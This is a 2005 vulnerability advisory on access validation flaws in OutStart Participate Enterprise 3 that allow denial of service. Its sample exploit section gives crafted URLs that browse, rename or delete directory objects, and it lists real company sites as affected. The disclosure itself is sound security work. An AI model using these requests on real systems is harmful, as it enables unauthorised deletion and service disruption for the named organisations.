-------------------------------------------------------- - Multiple Remote Access Validation Vulnerabilities -------------------------------------------------------- [Updated last on 11 MAR 2005] (Altrus::security.honour.ca) Program name: Participate Enterprises 3 Versions affected: OutStart Participate Enterprise 3 Versions not vulnerable: PE-3.2.1.0120 PE-3.3.1.0231 PE-3.4.0205 PE-3.5.0032 PE-3.7.0042 and Higher. Vendor(s): Outstart Inc. Participate Systems Inc. Vendor Notification Date: 23 FEB 2005 CVE: CAN-2005-0685 BugTraq ID: 12752 Risk: Moderately Serious Impact: Denial of Service, File Upload Vendor Homepages: http://www.outstart.com http://www.participate.com --------------------------------------------------------- - Description --------------------------------------------------------- PE is a proprietary java-based community that mimics the functionality provided by existing open-source software. It facilitates community forums, document libraries, message boards, user interaction and an user management infrastructure. From vendor site: Available as either a hosted or installed solution, OutStart Participate is improving the collaboration and knowledge-sharing capabilities of many world-class companies, including GE Healthcare, Caremark, palmOne, Logitech, McGraw-Hill and Tivo. OutStart Participate combines three different systems into one powerful knowledge-sharing platform. --------------------------------------------------------- - Discussion --------------------------------------------------------- The software is affected by an Access Validation Error that could allow a malicious users to rename or delete critical directory objects. This could result in a denial of service of all library, forum, and/or specialized content until the directory objects were restored or renamed appropriately. The Vendor has been notified of this issue, and has developed a patch. Sites and persons using the software are advised to install the patch - available from the vendor. Affected sites include: http://www.les-fontaines-community.com/pe/repository/displaynavigator.jsp http://forums.palmone.com/pe/repository/displaynavigator.jsp http://tivo.participate.com/pe/index.jsp http://pluggedin.palmone.com/regac/pluggedin/login.jsp http://logitech.participate.com/index.html http://auditorium.audi.com/pe/index.jsp http://mcgraw.participate.com/pe/index.jsp http://thomson.participate.com/index.html --------------------------------------------------------- - Sample Exploit Code --------------------------------------------------------- http://www.targetsite.com/pe/repository/displaynavigator.jsp?rootFolder=101 -Allows an attacker to browse a limited directory tree (in this case, the action directory. rootFolder=105 allows for the document library to be browsed. http://www.targetsite.com/pe/repository/include/renamepopup.jsp?selectedObject=101 -Allows an attacker to rename the selected object ID (in this case, the action directory). http://www.targetsite.com/pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101 -Sets the object CSV for the delete navigator. The following javascript commands might also be used to call functions otherwise unavailable to the user: showDeleteView() showWebFolderView() showLibraryView() showMyLibraryView() singleSelectObject(objid) processRadioSelection(radio, objid) processCheckboxSelection(chkbox, objid) singleSelectObject(objid) addToSelectedObjects(objid) removeFromSelectedObjects(objid) performAction() --------------------------------------------------------- - Solutions --------------------------------------------------------- The vendor has updated all versions of affected software. Implimentation of this update is confirmed 11 MAR 2005. --------------------------------------------------------- - References --------------------------------------------------------- Authorative and updated copies of this vulnerability can be found at: http://security.honour.ca --------------------------------------------------------- - Credits --------------------------------------------------------- Discovered by: Altrus [root@honour.ca]